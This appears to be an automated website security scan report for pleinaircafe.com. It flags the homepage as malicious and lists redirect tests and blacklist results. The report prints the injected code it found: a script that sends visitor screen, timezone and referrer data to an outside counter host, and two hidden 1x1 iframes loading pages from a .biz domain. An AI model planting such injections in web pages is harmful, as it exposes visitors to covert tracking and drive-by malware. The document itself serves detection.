Scanned pages/files
Request | Server response | Status |
http://www.pleinaircafe.com/ | 200 OK Content-Length: 53927 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- sw=screen.width+'x'+screen.height; bd=screen.colorDepth; dt=new Date();dt=dt.getTimezoneOffset()/-60; loc=escape(document.location); re=escape(parent.document.referrer);re=(re=="undefined"||re=="")?"bookmark":re; req="id="+9016+"&loc="+loc+"&re="+re+"&tz="+dt+"&sw="+sw+"&bd="+bd; document.write('<img width=4 height=4 src="http://cs.sexcounter.com/cs/?'+req+'">'); Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://dgfjhewfndsbfsdvf.biz/adv/167/new.php <iframe src="http://dgfjhewfndsbfsdvf.biz/adv/167/new.php" width="1" height="1"> Hidden iFrame found. size: 1x1 src: http://dgfjhewfndsbfsdvf.biz/adv/new.php?adv=167 <iframe src="http://dgfjhewfndsbfsdvf.biz/adv/new.php?adv=167" width="1" height="1"> | ||
http://www.pleinaircafe.com/test404page.js | 404 Not Found Content-Length: 488 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pleinaircafe.com
Result:
GET / HTTP/1.1
Host: pleinaircafe.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: pleinaircafe.com
Referer: http://www.google.com/search?q=pleinaircafe.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pleinaircafe.com
Referer: http://www.google.com/search?q=pleinaircafe.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pleinaircafe.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pleinaircafe.com/
Result: pleinaircafe.com is not infected or malware details are not published yet.
Result: pleinaircafe.com is not infected or malware details are not published yet.